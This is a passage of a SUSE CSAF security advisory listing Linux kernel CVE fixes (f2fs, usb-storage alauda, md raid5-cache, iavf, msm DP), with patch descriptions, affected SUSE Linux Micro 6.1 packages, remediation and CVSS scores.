fs/f2fs/file.c:574\n truncate_dnode+0x229/0x2e0 fs/f2fs/node.c:944\n f2fs_truncate_inode_blocks+0x64b/0xde0 fs/f2fs/node.c:1154\n f2fs_do_truncate_blocks+0x4ac/0xf30 fs/f2fs/file.c:721\n f2fs_truncate_blocks+0x7b/0x300 fs/f2fs/file.c:749\n f2fs_truncate.part.0+0x4a5/0x630 fs/f2fs/file.c:799\n f2fs_truncate include/linux/fs.h:825 [inline]\n f2fs_setattr+0x1738/0x2090 fs/f2fs/file.c:1006\n notify_change+0xb2c/0x1180 fs/attr.c:483\n do_truncate+0x143/0x200 fs/open.c:66\n handle_truncate fs/namei.c:3295 [inline]\n do_open fs/namei.c:3640 [inline]\n path_openat+0x2083/0x2750 fs/namei.c:3791\n do_filp_open+0x1ba/0x410 fs/namei.c:3818\n do_sys_openat2+0x16d/0x4c0 fs/open.c:1356\n do_sys_open fs/open.c:1372 [inline]\n __do_sys_creat fs/open.c:1448 [inline]\n __se_sys_creat fs/open.c:1442 [inline]\n __x64_sys_creat+0xcd/0x120 fs/open.c:1442\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nThe root cause is, inodeA references inodeB via inodeB\u0027s ino, once inodeA\nis truncated, it calls truncate_dnode() to truncate data blocks in inodeB\u0027s\nnode page, it traverse mapping data from node-\u003ei.i_addr[0] to\nnode-\u003ei.i_addr[ADDRS_PER_BLOCK() - 1], result in out-of-boundary access.\n\nThis patch fixes to add sanity check on dnode page in truncate_dnode(),\nso that, it can help to avoid triggering such issue, and once it encounters\nsuch issue, it will record newly introduced ERROR_INVALID_NODE_REFERENCE\nerror into superblock, later fsck can detect such issue and try repairing.\n\nAlso, it removes f2fs_truncate_data_blocks() for cleanup due to the\nfunction has only one caller, and uses f2fs_truncate_data_blocks_range()\ninstead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53846",
"url": "https://www.suse.com/security/cve/CVE-2023-53846"
},
{
"category": "external",
"summary": "SUSE Bug 1254983 for CVE-2023-53846",
"url": "https://bugzilla.suse.com/1254983"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53846"
},
{
"cve": "CVE-2023-53847",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53847"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb-storage: alauda: Fix uninit-value in alauda_check_media()\n\nSyzbot got KMSAN to complain about access to an uninitialized value in\nthe alauda subdriver of usb-storage:\n\nBUG: KMSAN: uninit-value in alauda_transport+0x462/0x57f0\ndrivers/usb/storage/alauda.c:1137\nCPU: 0 PID: 12279 Comm: usb-storage Not tainted 5.3.0-rc7+ #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS\nGoogle 01/01/2011\nCall Trace:\n __dump_stack lib/dump_stack.c:77 [inline]\n dump_stack+0x191/0x1f0 lib/dump_stack.c:113\n kmsan_report+0x13a/0x2b0 mm/kmsan/kmsan_report.c:108\n __msan_warning+0x73/0xe0 mm/kmsan/kmsan_instr.c:250\n alauda_check_media+0x344/0x3310 drivers/usb/storage/alauda.c:460\n\nThe problem is that alauda_check_media() doesn\u0027t verify that its USB\ntransfer succeeded before trying to use the received data. What\nshould happen if the transfer fails isn\u0027t entirely clear, but a\nreasonably conservative approach is to pretend that no media is\npresent.\n\nA similar problem exists in a usb_stor_dbg() call in\nalauda_get_media_status(). In this case, when an error occurs the\ncall is redundant, because usb_stor_ctrl_transfer() already will print\na debugging message.\n\nFinally, unrelated to the uninitialized memory access, is the fact\nthat alauda_check_media() performs DMA to a buffer on the stack.\nFortunately usb-storage provides a general purpose DMA-able buffer for\nuses like this. We\u0027ll use it instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53847",
"url": "https://www.suse.com/security/cve/CVE-2023-53847"
},
{
"category": "external",
"summary": "SUSE Bug 1254698 for CVE-2023-53847",
"url": "https://bugzilla.suse.com/1254698"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53847"
},
{
"cve": "CVE-2023-53848",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53848"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd/raid5-cache: fix a deadlock in r5l_exit_log()\n\nCommit b13015af94cf (\"md/raid5-cache: Clear conf-\u003elog after finishing\nwork\") introduce a new problem:\n\n// caller hold reconfig_mutex\nr5l_exit_log\n flush_work(\u0026log-\u003edisable_writeback_work)\n\t\t\tr5c_disable_writeback_async\n\t\t\t wait_event\n\t\t\t /*\n\t\t\t * conf-\u003elog is not NULL, and mddev_trylock()\n\t\t\t * will fail, wait_event() can never pass.\n\t\t\t */\n conf-\u003elog = NULL\n\nFix this problem by setting \u0027config-\u003elog\u0027 to NULL before wake_up() as it\nused to be, so that wait_event() from r5c_disable_writeback_async() can\nexist. In the meantime, move forward md_unregister_thread() so that\nnull-ptr-deref this commit fixed can still be fixed.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53848",
"url": "https://www.suse.com/security/cve/CVE-2023-53848"
},
{
"category": "external",
"summary": "SUSE Bug 1254753 for CVE-2023-53848",
"url": "https://bugzilla.suse.com/1254753"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53848"
},
{
"cve": "CVE-2023-53850",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53850"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: use internal state to free traffic IRQs\n\nIf the system tries to close the netdev while iavf_reset_task() is\nrunning, __LINK_STATE_START will be cleared and netif_running() will\nreturn false in iavf_reinit_interrupt_scheme(). This will result in\niavf_free_traffic_irqs() not being called and a leak as follows:\n\n [7632.489326] remove_proc_entry: removing non-empty directory \u0027irq/999\u0027, leaking at least \u0027iavf-enp24s0f0v0-TxRx-0\u0027\n [7632.490214] WARNING: CPU: 0 PID: 10 at fs/proc/generic.c:718 remove_proc_entry+0x19b/0x1b0\n\nis shown when pci_disable_msix() is later called. Fix by using the\ninternal adapter state. The traffic IRQs will always exist if\nstate == __IAVF_RUNNING.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53850",
"url": "https://www.suse.com/security/cve/CVE-2023-53850"
},
{
"category": "external",
"summary": "SUSE Bug 1254677 for CVE-2023-53850",
"url": "https://bugzilla.suse.com/1254677"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53850"
},
{
"cve": "CVE-2023-53851",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53851"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dp: Drop aux devices together with DP controller\n\nUsing devres to depopulate the aux bus made sure that upon a probe\ndeferral the EDP panel device would be destroyed and recreated upon next\nattempt.\n\nBut the struct device which the devres is tied to is the DPUs\n(drm_dev-\u003edev), which may be happen after the DP controller is torn\ndown.\n\nIndications of this can be seen in the commonly seen EDID-hexdump full\nof zeros in the log, or the occasional/rare KASAN fault where the\npanel\u0027s attempt to read the EDID information causes a use after free on\nDP resources.\n\nIt\u0027s tempting to move the devres to the DP controller\u0027s struct device,\nbut the resources used by the device(s) on the aux bus are explicitly\ntorn down in the error path. The KASAN-reported use-after-free also\nremains, as the DP aux \"module\" explicitly frees its devres-allocated\nmemory in this code path.\n\nAs such, explicitly depopulate the aux bus in the error path, and in the\ncomponent unbind path, to avoid these issues.\n\nPatchwork: https://patchwork.freedesktop.org/patch/542163/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53851",
"url": "https://www.suse.com/security/cve/CVE-2023-53851"
},
{
"category": "external",
"summary": "SUSE Bug 1254695 for CVE-2023-53851",
"url": "https://bugzilla.suse.com/1254695"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
